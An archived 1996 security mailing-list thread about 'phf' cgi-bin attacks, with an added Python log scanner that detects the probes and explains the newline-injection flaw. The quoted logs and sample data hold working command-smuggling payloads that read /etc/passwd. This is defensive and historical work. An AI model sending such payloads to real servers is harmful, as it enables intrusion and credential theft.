[2961] in WWW Security List Archive

Re: 'phf' cgi-bin attack

daemon@ATHENA.MIT.EDU (Corie Hamer)
Tue Sep 17 15:30:42 1996

Date: Tue, 17 Sep 1996 10:26:53 -0700
To: "Jordi \"Matemàtic\" Salvat" <jordi@webarna.com>,
        www-security@ns2.rutgers.edu
From: Corie Hamer <corie@angushamer.com>
Errors-To: owner-www-security@ns2.rutgers.edu

I don't know absolutely for sure what phf is, but my very first thought was
the CSO Nameserver which has a web "ph" interface.  If you run Eudora Mail,
it utilizes the "ph" phone directory service.  I used to be on the mailing
list but recently stopped since we are planning to go LDAP instead.  You can
either do a search on CSO Nameserver, or go to University of Urbana-Champaign.

Good Luck, Corie




At 10:20 PM 9/16/96 -0100, Jordi \"Matemàtic\" Salvat wrote:
>Many Spanish ISPs are receiving attack attempts on their WWW servers...
>they detect them on their log files in entries such as:
>
>info26.jet.es - - [04/Sep/1996:03:17:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
>infovia36_bcn.tinet.fut.es - - [04/Sep/1996:08:52:05 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>ia245.arrakis.es - - [04/Sep/1996:14:45:35 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>modem5.mrbit.es - - [09/Sep/1996:04:38:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>modem5.mrbit.es - - [09/Sep/1996:06:15:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>ppp03.las.es - - [12/Sep/1996:20:17:22 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>
>Obviously attempting to get the passwd file.
>
>What is curious about these attacks is that they all come from different
>dial-up providers, from users apparently scattered throughout Spain.
>Maybe an "organized" group who meets and exchanges ideas over the I-net?
>There have also been a few attempts apparently coming from the US. Of
>course most providers have initiated action to find out who those
>cracker-apprentices are, and warn them that what they are doing is a
>delict under the new Spanish Penal Laws.
>
>At least one of these attacks has been successful. The hacker then
>reportedly managed to find out the root password (bad password choice?) and
>replaced the getty and getty to leave a 'backdoor'. The hacker was
>reportedly invisible to 'who' and 'last', so the only way to know
>whether he was logged in was to look at the process list.
>
>Does anyone know what this 'phf' cgi-bin is supposed to be?
>
>Thanks for your help.
>-- 
>Jordi Salvat i Alabart
>  Web Edicions Barcelona
>  edicions i consultoria Internet
>  http://www.webarna.com


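Added example for the archive reader; it is not code from either poster and not NCSA's phf. Corie's guess is on the right track: phf was the sample CGI for querying a CSO "ph" nameserver that shipped in the cgi-bin directory of NCSA httpd and early Apache. It assembled a `ph -m ...` command line from the query string and ran it with popen() after backslash-escaping shell metacharacters, but that escape routine did not treat the newline as special, so an encoded %0a ended the ph command and whatever followed ran as a second shell command. That is exactly what the quoted log lines attempt; the 404 status on each line means that particular server had no /cgi-bin/phf to run. The Python below pulls such probes out of Common Log Format lines and, next to that, emulates the deny-list mistake beside the allow-list fix. The log sample re-joins the six requests Jordi quoted onto single lines and adds one made-up benign phf query (host.example.org); the regex, the function names and the metacharacter list are my assumptions, not NCSA's code.

```python
"""Spot phf newline-injection probes in Common Log Format access logs.

Added example; not code from the original post and not NCSA's phf.
The first six log lines are the ones Jordi quoted, re-joined onto single
lines; the seventh (host.example.org) is a made-up benign phf query.
The regex, function names and SHELL_META are assumptions of mine.
"""
import re
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
info26.jet.es - - [04/Sep/1996:03:17:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
infovia36_bcn.tinet.fut.es - - [04/Sep/1996:08:52:05 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
ia245.arrakis.es - - [04/Sep/1996:14:45:35 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
modem5.mrbit.es - - [09/Sep/1996:04:38:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
modem5.mrbit.es - - [09/Sep/1996:06:15:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
ppp03.las.es - - [12/Sep/1996:20:17:22 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
host.example.org - - [12/Sep/1996:21:00:00 +0100] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 512
"""

# Common Log Format: host ident user [time] "method target proto" status size
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


def parse_clf(line):
    """Return the CLF fields of one line as a dict, or None if it does not parse."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def phf_injected_command(target):
    """If `target` is a /cgi-bin/phf request whose decoded query contains a
    newline, return the text after that newline (what the attacker wanted
    the shell to run); otherwise return None.

    parse_qs percent-decodes for us, so %0a becomes a newline and %20 a space.
    """
    parts = urlsplit(target)
    if not parts.path.endswith('/cgi-bin/phf'):
        return None
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        for value in values:
            if '\n' in value:
                return value.split('\n', 1)[1]
    return None


def scan_log(text):
    """Return (host, status, injected_command) for every phf probe in `text`."""
    hits = []
    for line in text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        cmd = phf_injected_command(rec['target'])
        if cmd is not None:
            hits.append((rec['host'], rec['status'], cmd))
    return hits


# Why the probe works. phf built a `ph` command line from the query and
# handed it to popen() after backslash-escaping shell metacharacters.
# The emulation below is mine, not NCSA's code; the point it shows is
# that a deny-list which never mentions '\n' leaves the shell a second line.
SHELL_META = set('&;`\'"|*?~<>^()[]{}$\\')   # assumed deny-list; newline absent


def escape_like_phf(s):
    """Backslash-escape the listed metacharacters; everything else passes."""
    return ''.join('\\' + c if c in SHELL_META else c for c in s)


def shell_command_lines(alias):
    """Lines the shell would see if `ph -m <escaped alias>` went to popen():
    a newline inside `alias` turns one command into two."""
    return ('ph -m ' + escape_like_phf(alias)).split('\n')


def is_safe_alias(alias):
    """Hardened check: allow-list instead of deny-list. Only letters, digits,
    '.', '-' and '_' pass; anything else (newline included) is rejected.
    Even then, pass arguments as an argv array rather than through a shell."""
    return re.fullmatch(r'[A-Za-z0-9._-]+', alias) is not None


if __name__ == '__main__':
    for host, status, cmd in scan_log(SAMPLE_LOG):
        print(f'{host:28} {status}  injected: {cmd!r}')
    print(shell_command_lines('x\n/bin/cat /etc/passwd'))
```

Run it as a script to list the six probes with the command each one smuggled in; `shell_command_lines('x\n/bin/cat /etc/passwd')` comes back as two separate command lines, which is the whole bug in one call. The durable fix is not a better deny-list but removing phf (it was a demo, not a service) and, in any CGI that must run a helper, never going through a shell with user-supplied text.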